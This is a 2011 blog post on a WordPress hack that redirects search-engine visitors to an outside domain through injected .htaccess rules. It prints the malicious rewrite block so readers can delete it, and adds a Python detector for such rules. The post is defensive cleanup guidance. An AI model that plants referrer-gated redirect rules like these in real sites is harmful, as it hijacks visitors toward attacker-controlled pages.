19 Sep, 2011

I’ve come across several WordPress blogs that have been hacked recently. But this is an unusual hack, and you may not even know that your blog has been affected. You see, this hack only triggers when a visitor arrives at your blog from a search engine. When a visitor clicks your blog link in a search engine’s results (e.g. Google), they are redirected to http://sokoloperkovuskecl.com/in.php?g=XXX (with XXX varying from blog to blog). But if you simply type the URL of the hacked blog into the browser, the redirection does not occur. Sneaky.

How to Know You’ve Been Hacked

A simple way to find out if you’ve been hacked is to search for your blog on Google and click a link to any of your blog pages. If you have been hacked, here is how to fix it.

  1. View/edit your .htaccess file located in your root WordPress directory. If you don’t know how to find this file or don’t have access to your files, then download and install the plugin WP Htaccess Editor. Warning: You can seriously mess up your blog if you delete or add something incorrectly to your .htaccess file. Please only mess with this file if you know what you’re doing or have explicit instructions on what to do (like I have provided below).
  2. Find and delete the entire hack (shown below) which is usually located at the top of the .htaccess file:
    <IfModule mod_rewrite.c>
     RewriteEngine On
     RewriteOptions inherit
     RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
     RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
     RewriteRule .*http://sokoloperkovuskecl.com/in.php?g=56 [R,L]
     </IfModule>
  3. If you’re using the WordPress plugin, save the file. If you’re editing the file on your server, you will need to save and/or upload the file.
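As an added example (not code from the original post), here is a small Python checker that scans an .htaccess file for the pattern above: RewriteCond lines testing HTTP_REFERER followed by a RewriteRule that sends the visitor to an outside host. The OWN_HOSTS names are an assumption standing in for your own domain, and SAMPLE_HTACCESS is constructed from a shortened copy of the post’s snippet plus WordPress’s normal rewrite block.

```python
import re
from urllib.parse import urlparse

# Assumption: the blog's own hostnames; redirects to these are not reported.
OWN_HOSTS = {"example-blog.com", "www.example-blog.com"}
# Substrings identifying the search-engine referrers the hack keys on.
SEARCH_ENGINES = ("google", "bing", "yahoo", "msn", "aol", "ask.com", "live.com", "altavista", "excite")
ABS_URL = re.compile(r"https?://[^\s\]]+", re.IGNORECASE)

# Constructed sample: the post's hack (shortened) followed by WordPress's normal rewrite block.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .*http://sokoloperkovuskecl.com/in.php?g=56 [R,L]
</IfModule>
# BEGIN WordPress
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""


def find_referrer_redirects(htaccess_text, own_hosts=OWN_HOSTS):
    """One finding per RewriteRule that is gated by HTTP_REFERER conditions
    and sends the visitor to a host outside own_hosts."""
    findings, referer_patterns = [], []
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() == "%{HTTP_REFERER}":
                referer_patterns.append(parts[2])
        elif directive == "rewriterule":
            # Regex search tolerates the missing space before the URL in the post's sample.
            for url in ABS_URL.findall(raw):
                host = (urlparse(url).hostname or "").lower()
                if referer_patterns and host not in own_hosts:
                    keyed = any(s in p.lower() for p in referer_patterns for s in SEARCH_ENGINES)
                    findings.append({"line": lineno, "target_host": host,
                                     "referer_patterns": list(referer_patterns),
                                     "keyed_on_search_engines": keyed})
            referer_patterns = []  # RewriteConds apply only to the next RewriteRule
    return findings
```

Run it over your real .htaccess with `find_referrer_redirects(open(".htaccess").read())`; a non-empty result with `keyed_on_search_engines` set is exactly the hack this post describes, while WordPress’s own rules produce no finding.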

Why You Were Hacked

You didn’t do anything wrong; don’t worry! The problem lies with a vulnerability in timthumb.php, a component of some WordPress themes that is used to generate thumbnails. An unpatched timthumb.php file can allow code to be executed from the timthumb cache directory, or allow code to be injected into other WordPress files. If you’re concerned about this, ask your theme developer whether your theme uses timthumb.php. If it does, make sure you have the newest version.

How to Prevent Your Blog From Being Hacked Again

If you don’t protect your blog, you will be hacked again. To prevent this, download and install the plugin BulletProof Security. I will walk you through the steps to set up BulletProof Security, since this plugin may appear a little overwhelming.

  1. Navigate to BPS Security in your WordPress admin.
  2. Click the Backup & Restore tab, select the radio button next to “Backup .htaccess Files” and click “Backup Files.” (This is a security measure should you need to restore from your original backup.)
  3. Click the Security Modes tab. Click Backup .htaccess Files. Then click Backup .htaccess Files.
  4. Select the radio button next to the first “BulletProof Mode” and click “Activate.” Repeat this process for the other three “BulletProof Mode” radio buttons (one at a time) and click “Activate” after each one.
  5. Click the Backup & Restore tab, click the radio button next to “Backup BPS Master .htaccess Files” and click “Backup BPS Master .htaccess Files.”

If you’d like to check the security status of your blog, click the Security Status tab. All items should be green. If they aren’t green, you should fix them. If you don’t know how, tell me and I’ll try to help you.

Happy blogging!
